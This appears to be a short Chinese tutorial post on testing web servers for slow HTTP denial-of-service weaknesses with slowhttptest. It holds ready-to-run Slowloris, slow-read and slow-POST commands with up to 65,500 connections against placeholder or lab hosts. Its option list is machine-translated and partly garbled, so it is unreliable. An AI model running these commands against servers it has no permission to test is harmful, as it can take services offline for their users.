- 经常用awvs的对这个名字肯定不陌生,基本上扫过的站有60%存在这个问题,是个很常见的漏洞,包含了几种攻击方式,像Slowloris,SlowHTTP POST,Slow Read attack等
- slowhttptest是验证漏洞的一款工具
- kali默认没有这款工具,需要自己安装
apt-get install slowhttptest
- 案例演示
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://mysite -x 10 -p 3
- a —开始开始值范围说明符用于范围头测试
- b 将字节限制的范围说明符用于范围头测试
– c 的连接数限制为65539
– d proxy host:port 用于指导所有流量通过web代理
– e proxy host:port 端口用于指导只有探针交通通过web代理
– h,B,R或x 指定减缓在头部分或在消息体,- R 允许范围检验,使慢读测试- x
– g 生成统计数据在CSV和HTML格式,模式是缓慢的xxx。csv / html,其中xxx是时间和日期
– i seconds 秒间隔跟踪数据在几秒钟内,每个连接
– k 管道因子次数重复请求在同一连接慢读测试如果服务器支持HTTP管道内衬。
– l 在几秒钟内,秒测试时间
– n 秒间隔从接收缓冲区读取操作
– o 文件定义输出文件路径和/或名称,如果指定有效- g
– p 秒超时等待HTTP响应在探头连接后,服务器被认为是不可访问的
– r seconds 连接速度
– s 字节值的内容长度标题详细说明,如果指定- b
– t verb 自定义
– u URL 目标URL,相同的格式键入浏览器,e。g https://host[:port]/
– v level 冗长等级0 – 4的日志
– w 字节范围广告的窗口大小会选择从
– x 字节最大长度的跟踪数据结束
– y 字节范围广告的窗口大小会选择从
– z 字节从接收缓冲区读取字节与单一的read()操作
- slow header
slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://debian7:8889
- slow read
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://xxxxx -p 5 -l 350 -e x.x.x.x:8080
slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://debian7:8889
- slow post
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://xxxxx -x 10 -p 3
slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://debian7:8889
- slowloris
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxxx -x 24 -p 3
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://xxxxx -x 24 -p 3
网友评论